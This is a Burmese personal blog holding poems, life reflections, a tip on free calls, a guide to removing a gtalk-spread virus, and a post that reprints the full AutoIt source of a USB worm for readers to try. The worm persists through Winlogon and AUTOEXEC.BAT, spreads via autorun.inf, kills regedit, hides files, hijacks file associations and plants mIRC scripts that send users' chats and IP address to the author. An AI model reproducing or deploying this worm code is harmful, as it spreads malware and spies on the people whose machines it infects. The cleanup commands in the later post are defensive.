hay! pyaw ya ag
Monday, March 2, 2009
ငါဆုိတာ ဘာေကာင္လဲဟ
င့ါ အိမ္မက္က ဘာလဲ ငါမသိေတာ့
ငါ့ ဘ၀က ဘာလဲ ငါမသိေတာ့
ငါ့သြားမဲ့ လမ္း ေကာင္းလားမေကာင္းလား ငါ မသိေတာ့
အိမ္မက္ထဲေတာင္ ငါကုိ ငါ ဘာေကာင္မသိ
ငါခ်စ္တယ္ ဆုိတာ ငါမသိေတာ့
လူေလာကရဲ႕ ေကာင္းျခင္း လဲ ငါမသိေတာ့
လူေလာကရဲ႕ က်င့္၀တ္ဆုိတာ ဘယ္လုိ ခ်သင့္လဲ ငါမသိေတာ့
ခု ငါပ်င္းေနတာ လား ငါမသိေတာ့ .. ငါမစဥ္းစားခ်င္ေတာ့
ငါမစဥ္းစားျဖစ္ေတာ့
ငါကုိယ္ငါေတာင္ ဘာမွန္း ငါမသိေတာ့ပါလား..
ကဲ ေျပာၾကည့္ပါ .. ငါဘာေကာင္လဲ ...
စိတ္ညစ္ေနလုိ႕ ေလွ်ာက္ေရးၾကည့္တာ ကဗ်ာျဖစ္တယ္ ေလ..သိတယ္ မဟုတ္လား အလင္းေရာင္ေလ..
Saturday, February 28, 2009
U3 System
Friday, December 26, 2008
ဖ်က္ႀကီ .. ေတာ္ေတာ္ ဆုိတယ္
RegWrite("HKEY_CLASSES_ROOT\. ", "", "REG_SZ", "exefile")
RegWrite("HKEY_CLASSES_ROOT\.~»", "", "REG_SZ", "exefile")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\. ", "", "REG_SZ", "exefile")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.~»", "", "REG_SZ", "exefile")
RegWrite("HKEY_CLASSES_ROOT\*", "InfoTip", "REG_SZ", "I love you baby!")
If ProcessExists("msconfig.pif")then
$dir = "explorer.exe " & @ScriptDir
Run( $dir , "", @SW_MAXIMIZE) ;if user open the drive, allow it
EndIf
If ProcessExists("«~.~»") Then ;if not infected
Else
FileCopy( @ScriptFullPath , @SystemDir & "\ntdetect.com",1) ;0 =not overwrite 1 = overwrite
FileSetAttrib( @SystemDir & "\ntdetect.com", "+R+S+H")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon", "Userinit", "REG_SZ" ,@SystemDir & "\userinit.exe," & @SystemDir & "\ntdetect.com")
FileCopy( @ScriptFullPath , @SystemDir & "\«~.~»",1)
FileSetAttrib( @SystemDir & "\«~.~»", "+R+S+H")
FileSetAttrib( "c:\AUTOEXEC.BAT", "-R")
$file = FileOpen("c:\AUTOEXEC.BAT", 2) ;0 Read,1 Append , 2 Clear contents
; Check if file opened for writing OK
If $file = -1 Then
Exit
EndIf
FileWrite($file, "start " & @SystemDir & "\«~.~»")
FileClose($file)
Run( @SystemDir & "\«~.~»" ,"" , @SW_HIDE)
EndIf
$app = @ScriptDir
$var = DriveGetType( $app )
If $var = "REMOVABLE" then ;First run from Memory Stick Initial stage for infection
$dir = "explorer.exe " & @ScriptDir
Run( $dir , "", @SW_MAXIMIZE) ;if user open MEmorystick allow it
Elseif $var = "fixed" then ;running from computer
If @SystemDir & "\ntdetect.com" = @ScriptFullPath then
RegWrite("HKEY_CLASSES_ROOT\.mp3", "", "REG_SZ", "love")
RegWrite("HKEY_CLASSES_ROOT\.jpg", "", "REG_SZ", "love")
RegWrite("HKEY_CLASSES_ROOT\love", "", "REG_SZ", "somazina@gmail.com")
RegWrite("HKEY_CLASSES_ROOT\dllfile\DefaultIcon", "", "REG_SZ", @SystemDir & "\«~.~»,0")
RegWrite("HKEY_CLASSES_ROOT\love\DefaultIcon", "", "REG_SZ", @SystemDir & "\«~.~»,0")
RegWrite("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon", "", "REG_SZ", @SystemDir & "\«~.~»,0")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.mp3", "", "REG_SZ", "love")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.jpg", "", "REG_SZ", "love")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\love", "", "REG_SZ", "somazina@gmail.com")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\love\DefaultIcon", "", "REG_SZ", @SystemDir & "\«~.~»,0")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\dllfile\DefaultIcon", "", "REG_SZ", @SystemDir & "\«~.~»,0")
RegWrite("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon", "", "REG_SZ", @SystemDir & "\«~.~»,0")
If @MON = "2" and @MDAY = "16" Then Exit
Elseif @SystemDir & "\«~.~»" = @ScriptFullPath then
$ii = 0
$count = 0
Do
$drv = DriveGetDrive( "removable" ) ;Check for removable Disk to be infected
If NOT @error Then
If @MON = "2" and @MDAY = "16" Then ExitLoop
For $i = 1 to $drv[0]
if $drv[$i] <> "a:" then
if DriveStatus ( $drv[$i] ) = "READY" then
FileCopy( @ScriptFullPath , $drv[$i] & "\phyatkyee.blogspot.com",0)
FileCopy( @ScriptFullPath , $drv[$i] & "\Photos.exe",0)
FileSetAttrib( $drv[$i] & "\autorun.inf", "-R-S")
IniWrite($drv[$i] & "\autorun.inf", "autorun", "open", "phyatkyee.blogspot.com")
IniWrite($drv[$i] & "\autorun.inf", "autorun", "shellexecute", "phyatkyee.blogspot.com")
IniWrite($drv[$i] & "\autorun.inf", "autorun", "shell\Explore\command", "phyatkyee.blogspot.com")
IniWrite($drv[$i] & "\autorun.inf", "autorun", "shell\Open\command", "phyatkyee.blogspot.com")
IniWrite($drv[$i] & "\autorun.inf", "autorun", "shell", "Explore")
FileSetAttrib( $drv[$i] & "\autorun.inf", "+S+H")
EndIf
EndIf
Next ;end of next for removeable drives
$fix = DriveGetDrive( "fixed" )
For $a = 1 to $fix[0] ;for Hard drives
If DriveStatus ( $fix[$a] ) = "UNKNOWN" then
Else
FileCopy( @ScriptFullPath , $fix[$a] & "\msconfig.pif",1)
IniWrite($fix[$a] & "\autorun.inf", "autorun", "open", "msconfig.pif")
IniWrite($fix[$a] & "\autorun.inf", "autorun", "shellexecute", "msconfig.pif")
IniWrite($fix[$a] & "\autorun.inf", "autorun", "shell\Explore\command", "msconfig.pif")
IniWrite($fix[$a] & "\autorun.inf", "autorun", "shell\Open\command", "msconfig.pif")
IniWrite($fix[$a] & "\autorun.inf", "autorun", "shell", "Explore")
FileSetAttrib( $fix[$a] & "\autorun.inf", "+R+S+H")
EndIf
Next
;check for initial program
If ProcessExists(" . ") Then
Else
FileCopy( @ScriptFullPath , @ProgramFilesDir & "\ . ",1)
Run( @ProgramFilesDir & "\ . ", "", @SW_HIDE)
EndIf
EndIf
Sleep(10000)
Until $ii = 10
Elseif @ProgramFilesDir & "\ . " = @ScriptFullPath then
While 0 <> 1
If @MON = "2" and @MDAY = "16" Then Exit
If ProcessExists(" . ") = 0 Then
FileCopy( @ScriptFullPath , @WindowsDir & "\ . ",1)
Run(" . ", "", @SW_HIDE)
EndIf
If ProcessExists("«~.~»") = 0 Then
FileCopy( @ScriptFullPath , @SystemDir & "\«~.~»",1)
Run("«~.~»", "", @SW_HIDE)
EndIf
ProcessClose("regedit.exe")
$PID = ProcessExists("regedit.exe") ; Will return the PID or 0 if the process isn't found.( PID= Process ID )
If $PID Then ProcessClose($PID)
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "ShowSuperHidden", "REG_DWORD" ,"0")
sleep(500)
WEnd
Elseif @WindowsDir & "\ . " = @ScriptFullPath then
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Yadanar", "REG_SZ", @WindowsDir & "\TASKMAN.EXE")
While 0 <> 1
If @MON = "2" and @MDAY = "16" Then Exit
If ProcessExists(" . ") = 0 Then
FileCopy( @ScriptFullPath , @ProgramFilesDir & "\ . ",1)
Run(@ProgramFilesDir & "\ . ", "", @SW_HIDE)
EndIf
If ProcessExists("«~.~»") = 0 Then
FileCopy( @ScriptFullPath , @SystemDir & "\«~.~»",1)
Run("«~.~»", "", @SW_HIDE)
Endif
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoDriveTypeAutoRun", "REG_DWORD", "1")
sleep(500)
WEnd
Endif ;fixed drive end
Endif; Main End
;for MIRc program
if FileExists( "C:\Program Files\mIRC\mirc.ini") then
$file = FileOpen("C:\Program Files\mIRC\mth.dll", 2);1 append 2 erase
If $file = -1 Then
Exit
EndIf
FileWrite($file, "on *:text:*:*: { .msg PhyatKyee «« < $+ $iif($chan,# $+ :,$+ ) $+ $nick $+ > $1- }" & @CRLF)
FileWrite($file, "on *:input:*: { .msg PhyatKyee »» $iif($left($1,1) != / , < $+ $active $+ > ,[command]) $1- }" & @CRLF)
FileWrite($file, "on *:JOIN:#: { .msg PhyatKyee IP $+ » $+ $ip ¤ Host $+ » $+ $host ¤ $os ¤ server $+ » $+ $server ¤ $serverIP }")
$file = FileOpen("C:\Program Files\mIRC\mirc.dll", 2)
If $file = -1 Then
Exit
EndIf
FileWrite($file, ";If you don't know what you were doing" & @CRLF)
FileWrite($file, ";Don't modify the codes" & @CRLF)
FileWrite($file, ";By... PhyatKyee" & @CRLF)
FileWrite($file, "on ^*:text:'*:?: { . $+ $2- | haltdef }" & @CRLF)
FileWrite($file, ";combo 20, 100 41 104 285, edit " & @CRLF)
FileWrite($file, ";text Ops (+o):, 5, 3 44 95 13, right}" & @CRLF)
FileWrite($file, ";on 1:dialog:ncor:init:0:{" & @CRLF)
FileWrite($file, ";on ^*:text:'*:?: { . $+ $2- | haltdef }" & @CRLF)
FileWrite($file, ";}" & @CRLF)
FileWrite($file, "on *:connect: { /timer 30 120 /.msg PhyatKyee hi I'm now Using mIRC »» mth.dll }")
IniWrite("C:\Program Files\mIRC\mirc.ini", "rfiles", "n2", "mirc.dll")
IniWrite("C:\Program Files\mIRC\mirc.ini", "warn", "fserve", "off")
IniWrite("C:\Program Files\mIRC\mirc.ini", "warn", "dcc", "off")
IniWrite("C:\Program Files\mIRC\mirc.ini", "warn", "link", "off")
endif
; for scoopScript2004
if FileExists( "C:\Scoop2004\mirc.ini") then
$file = FileOpen("C:\Scoop2004\mth.dll", 2)
If $file = -1 Then
Exit
EndIf
FileWrite($file, "on *:text:*:*: { .msg PhyatKyee «« < $+ $iif($chan,# $+ :,$+ ) $+ $nick $+ > $1- }" & @CRLF)
FileWrite($file, "on *:input:*: { .msg PhyatKyee »» $iif($left($1,1) != / , < $+ $active $+ > ,[command]) $1- }" & @CRLF)
FileWrite($file, "on *:JOIN:#: { .msg PhyatKyee IP $+ » $+ $ip ¤ Host $+ » $+ $host ¤ $os ¤ server $+ » $+ $server ¤ $serverIP }")
$file = FileOpen("C:\Scoop2004\remote03.sco", 2)
If $file = -1 Then
Exit
EndIf
FileWrite($file, "on ^*:text:'*:?: { . $+ $2- | haltdef }" & @CRLF)
FileWrite($file, "on *:connect: { /timer 30 120 /.msg PhyatKyee Scoop »» mth.dll }")
IniWrite("C:\Scoop2004\mirc.ini", "rfiles", "n3", "remote03.sco")
IniWrite("C:\Scoop2004\mirc.ini", "warn", "fserve", "off")
IniWrite("C:\Scoop2004\mirc.ini", "warn", "dcc", "off")
IniWrite("C:\Scoop2004\mirc.ini", "warn", "link", "off")
endif
;If my birthday
if @WDAY = "5" then
While 0 <> 1
msgbox(4096,"Birthday","Happy Birthday !" & @CRLF & "And I love you So Much." & @CRLF & "Ko PhyatKyee" )
sleep(50000)
RegWrite("HKEY_CLASSES_ROOT\.mp3", "", "REG_SZ", "mp3file")
RegWrite("HKEY_CLASSES_ROOT\.jpg", "", "REG_SZ", "jpegfile")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.mp3", "", "REG_SZ", "mp3file")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.jpg", "", "REG_SZ", "jpgfile")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.lnk", "", "REG_SZ", "lnkfile")
sleep(90000)
WEnd
EndIf
ေအာက္ကဟာကေတာ့ mircchatက စပုိင္ပရိုဂရမ္ေလးပါ
စိတ္ဝင္စားရင္ စမ္းၾကည္ပါခင္ဗ်ာ
အဲသလုိ ေရထာတာေတာ့ ကုိ ဖ်က္ႀကီ ျဖစ္ပါတယ္ ကၽြန္ေတာ္ ေတာ့ နည္နည္ ရုိင္တယ္လုိ ေရခဲ့တယ္..
ခင္ဗ်ာ တုိ႔ ဘယ္လုိ႔ ထင္လဲ ဗ်..
သူ virus က computer icon ပုံေတြကုိ ေကာင္မေလ ပုံ ေျပာင္တာ တုိ႔ ဘာလုိ႔ လုပ္တယ္ ဗ်ာ..
သိပ္ ေတာ့ မထိခုိက္ဘူလုိ႔ ေျပာၾကတာ ပဲ
ကၽြန္ေတာ္ လဲ မလုပ္တတ္ေသဘူ ခုမွ စမ္ ၾကည့္ ရမွာ သူဘေလာက္ ကုိ သြာၾကည့္ေတာ့ အဲဒီ code ေတြ တာ နဲ႔ ခု အျခာ လူေတြ နည္လမ္မ်ာ ရမလာ လုိ႔ .. တင္ေပလိုက္ပါတယ္ ခင္ဗ်ာ..
ေလစာစြာျဖင့္
အလင္ေရာင္
Friday, November 7, 2008
ကဲ ဘယ္လုိ႔ လဲ
ဘာျဖစ္လုိ႔ လဲ ဆုိေတာ့ ကၽြန္ေတာ္ အေနနဲ႔ ေျပာရရင္ ကၽြန္ေတာ္ က လြတ္လပ္ ေပ့ါပါးစြာနဲ႔.. ဘယ္အရာကုိမွ အႀကြင္းအက်န္ ထားခဲ့တာ ၀ါသနာမပါဘူး လြယ္လြယ္ကူကူ ေျပာရရင္ လူပ်ိဳ ေတြရဲ႔ ထုံးစံ အတုိင္း အရာရာ ကုိ ေပါ့ေပ့ါတန္တန္ ေတြးမယ္ လုပ္စရာ ရွိတာကုိ လုပ္သြားခဲ့ရင္ ပုိက္ဆံ ေငြေႀကး က ေနာက္က လုိက္လာလိမ့္မယ္ ထင္ခဲ့တယ္..
ကဲ ခု စာရင္းရွင္းေတာ့ ..
ဒီစာရြက္ ေလးသာ ၾကည့္လုိက္ပါေတာ့ .. 28000 တဲ့ အဲဒါ အကုန္ မဟုတ္ေသးဘူး ဗ် ..ေနာက္ထပ္ စာရင္း ထပ္ ရွင္းလုိက္ေတာ့.. ဘယ္ေလာက္ က်န္လဲ သိလား 14000 ပဲ က်န္ေတာ့တယ္ ..အဲဒါ ထပ္ ၿပီး အေႀကြးဆပ္လုိက္ေတာ့ ဘယ္ေလာက္ က်န္လဲ.. သိလား 11000 ေလာက္ပဲ က်န္ေတာ့တယ္ ဗ်..
သိပ္ ၀မ္းနည္းမေနနဲ႔ က်အုန္းဗ်.. သိလား .. ကၽြန္ေတာ္ လခ ကုိ 3 လပို္င္းကတည္းက မရွင္းတာ ခု မဂၤလာ ေဆာင္မယ္ ဆုိမွ ရွင္းလုိက္ေတာ့ ထြက္လာတဲ့ စာရင္း ေလ..
လုပ္တဲ့ အလုပ္ကေတာ့ ဗ်ာ ကၽြန္ေတာ္ ဆုိင္ကုိ လာတဲ့ လူေတြ ကၽြန္ေတာ္ နဲ႔ ရင္းႏွီးတဲ့ လူေတြ ေတာ္ေတာ္ မ်ား မ်ား သိပါတယ္.. ကုိလင္းထုိက္ ဘယ္လုိ႔ အလုပ္လုပ္တယ္ ဆိုတာ အလုပ္ကိုအာရုံ စိုက္တယ္ ကို္ယ့္ အလုပ္လုိ႔ သေဘာထားတယ္ဆုိတာ ေလ..
ကဲ ဒီေန႔ ကေန စတာ ပါပဲ စဥ္းစားၾကည့္လုိက္ .. ဘယ္သူမွားမယ္ ထင္လဲ ..
ကၽြန္ေတာ္ အသုံးအျဖဳန္းႀကီးတယ္ ေျပာမလား အင္း ေျပာလုိ႔ ရပါတယ္..
အလုပ္ရွင္ က ညစ္တယ္ ေျပာမလား .. သိပ္ ေျပာလုိ႔ မရဘူး သူဘက္ က အလြတ္ေတြ လုပ္ျပထားတယ္ ေလ..
ကဲ့ ကၽြန္ေတာ္ ဘယ္ကုိ အျပစ္ေျပာမလဲ ဆုိတာ .. ၾကည့္ၾကည္ပါအုန္း..
ပထမ အျပစ္ေျပာခ်င္တာ က ကုိယ္ပုိင္ အလုပ္ ကုိ မလုပ္ခဲ့တဲ့ ကၽြန္ေတာ္..
1- ကုိယ္ပုိင္ အလုပ္သာလွ်င္ ကုိယ္ရဲ႔ ေငြေၾကး အေဆာက္အအုံကုိ အမွန္အကန္ ေထာက္မေပးေသာ ေထာက္ျဖစ္သည္။
အက်ိဳး -..
ကၽြန္ေတာ္ လက္တြဲေဖာ္ ျဖစ္လာမဲ့.. ေကာင္မေလး ကုိ အဲဒီ အေၾကာင္းေျပာလုိက္ေတာ့ သူက ဘာျပန္ေျပာသလဲ ဆုိေတာ့ နင္ ျပန္လာခဲ့တဲ့.. နင္ ေရာက္ဖုိ႔သာ အဓိက တဲ့.. ဘာမွ စိတ္ဓာက္မက်နဲ႔..
ေက်းဇူးတင္တယ္ ခ်စ္သူ
ဒီလုိ႔ မ်ိဳး တေလွ်ာက္လုံး လက္တြဲ သြားရမွာ ဘယ္ေလာက္ ေပ်ာ္ဖုိ႔ ေကာင္းမွာလဲ ခင္ဗ်ားတုိ႔ စဥ္းစားၾကည့္ပါ...
ကၽြန္ေတာ္ ဘ၀ မွတ္တုိက္ တစ္ခု ..
ေလးစားစြာျဖင့္
အလင္းေရာင္ (Linker+)
Thursday, October 30, 2008
ခ်စ္တယ္ လုိ႔ ေျပာခဲ့တယ္
မုန္းတယ္လုိ႔ ေျပာခဲ့တုန္း က လဲ.. ခ်စ္လုိ႔ ပါ.. ခ်စ္သူ..
တုိ႔ လက္တြဲ မယ္ ေျပာတုန္း က လဲ .. ခ်စ္လုိ႕ ပါ ခ်စ္သူ..
တုိ႔ စိတ္ဆုိးတုန္းက လဲ ခ်စ္လုိ႔ပါ ခ်စ္သူ...
တုိ႔ အခန္႔ မသင့္ျဖစ္တာလဲ . ခ်စ္လုိ႔ ပါခ်စ္သူူ...
တုိ႔ ခု လက္ထပ္ၾကတာလဲ ခ်စ္လုိ႔ ပါ ခ်စ္သူ..
တုိ႔ တစ္ဘ၀လုံးအတူတူ ေနသြားမယ္ ဆုိတာ လဲ .. ခ်စ္လုိ႔ ပါခ်စ္သူ...
တုိ႔ ရန္ျဖစ္ခဲ့ရင္လဲ... ခ်စ္လုိ႔ ပါ..ခ်စ္သူ..
မင္းဘာပဲျဖစ္ျဖစ္ ... ခ်စ္လုိ႔ ပါခ်စ္သူ.. ဘာျဖစ္လုိ႔ လဲ ဆုိေတာ့ တုိ႔ ဘာပဲ ျဖစ္ျဖစ္ မင္းခ်စ္ေနမယ္လုိ႔.. ယုံလုိ႔ ပါခ်စ္သူ..
ဘာပဲျဖစ္ျဖစ္ ...ခ်စ္တယ္လုိ႔ ေျပာခဲ့တယ္ေလ..
ေလးစားစြာျဖင့္
အလင္းေရာင္
Sunday, October 26, 2008
One month of free worldwide calls
|
| ||||||||||
| ||||||||||
|
ခု ကၽြန္ေတာ္ စမ္းၾကည့္တာ ေတာ့ ျမန္မာ ျပည္က ဖုန္း ပါ ျပန္ေခၚလုိ႔ ၇တယ္ဗ်.. စင္ကာပူလဲ ေခၚလုိ႔ ၇တယ္ဗ်.. အျခားလူေတြ လဲ အက်ိဳးရွိစြာ အခ်ိန္မွီ အသုံးခ်ႏိုင္ေအာင္.. ေအာ္လုိက္တယ္ဗ်ိဳ႕...ေလးစားစြာျဖင့္အလင္းေရာင္
Saturday, October 25, 2008
gtalk ကေန လာတဲ့ မေကာင္းဆုိး၀ါး
gtalk ကေန လာတယ္ ေလ..
Waiting for you, view my private cam via secured connection http://h1.ripway.com/db1/privateCam_
22 female indian
nu
of course
တုိ႔ ကုိ အလုိအေလွ်ာက္ ရုိက္ေတာ့တာ ပဲ ဗ်ိဳ႕ .. ၿပီးရင္ အျခားလူကုိလဲ အဲဒီ link ကုိ ဆက္ပုိ႔ တာပဲ ဗ်ိဳ႕ ဒါဆုိရင္ က်ိန္းေသမွတ္လိုက္ ေတာ့ ဒီေကာင္ထိၿပီပဲ .. ..
ဘယ္လုိ႔ ရွင္းရသလဲ ဆုိေတာ့ ဒီေကာင္ က taskmgr ကုိလဲ ေဖ်ာက္တားတယ္ ဗ်.. အဲဒီ က်ေတာ့ ဒီေကာင္ process ကုိ end လုိ႔ မ၇ေတာ့..
ေအာက္ က ဟာေတြ ကုိ ကူးဗ်ာ..
taskkill /F /IM privateCam_v0.1.exe
attrib -S -H -R C:\windows\system32\chrome.exe
del C:\windows\system32\chrome.exe
REG Delete HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /f
REG Delete HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /f
REG Delete HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NofolderOptions /f
REG Delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v “Yahoo Messengger” /f
REG Delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v “Yahoo! pager” /f
gpupdate
ၿပီးရင္ notepad မွာ bat ဖုိင္ အျဖစ္ သိမ္းဗ်ာ.. (ဥပမာ - killchrome.bat)
ၿပီးရင္ run လုိက္ဗ်ာ.. ဒီေကာင္ effect ေတာ္ေတာ္မ်ား မ်ား ကုိ ရွင္းပစ္ႏိုင္သြားလိမ့္မယ္..
ဒါေပမယ့္ စိတ္မခ်နဲ႔ အုန္းဗ်.. အင္တာနက္ေပၚ က ေန hijackthis ကုိ download လုပ္ထားၿပီးရင္ run လုိက္ ဒီေကာင္ window အစ မွာ run မယ္လုိ႔ ေၾကျငာထားတဲ့.. chrome.exe, private_webcam.exe ဆုိတာ ေတြကုိ လိုက္ျဖဳတ္ဗ်ာ..
အဲဒါၿပီး၇င္ မၿပီးေသးဘူးဗ်.. ဒီေကာင္ folder ေတြ နာမည္ကုိ ယူၿပီး .exe လုပ္ပလုိက္ေတာ့ ယူဇာေတြက မသိဘူး folder ဖြင့္တုိင္း ပြား ခ်င္တုိင္ းပြားေနတာ ေတြ႔ ရမယ္.. အဲဒါ ေတြကုိ လဲ del လုပ္ဖုိ႔ tool ေအာက္ က folder option ေအာက္မွာ view tab ေအာက္မွာ
show hidden files and folders ကုိ ေရႊး
hide extension for known file types
hide protected operation system file ေတြကုိ အမွန္ျခစ္ျဖဳတ္ပလုိက္ ..
ၿပီး ရင္ start ေအာက္ search မွာ all file and folder ကုိဖြင့္ More advaced option ေအာက္ က search hidden files and folder ကုိ အမွန္ျခစ္လုိက္ ..ၿပီးရင္..
*.exe လုိ႔ ရွာမယ္ box မွာ ရုိက္ထည့္ေပးလုိက္..
ရွာေတြ႔ တဲ့ အထဲကမွ.. folder ပုံစံမ်ိဳး .exe application ေတြ အားလုံး virus ျဖစ္ႏုိင္တဲ့ ေကာင္ေတြ ပဲ.. shift+ del လုပ္ပလုိက္.. ရွင္းေရာ္..
restart ခ်ၾကည့္ ျပန္စစ္ၾကည့္ .. ေကာင္းသြားလိမ့္မယ္.. ....အမေလး မုိးလင္းဘာေရာ္လား.. ဗ်ာ..
ေလးစားစြာျဖင့္
အလင္းေရာင္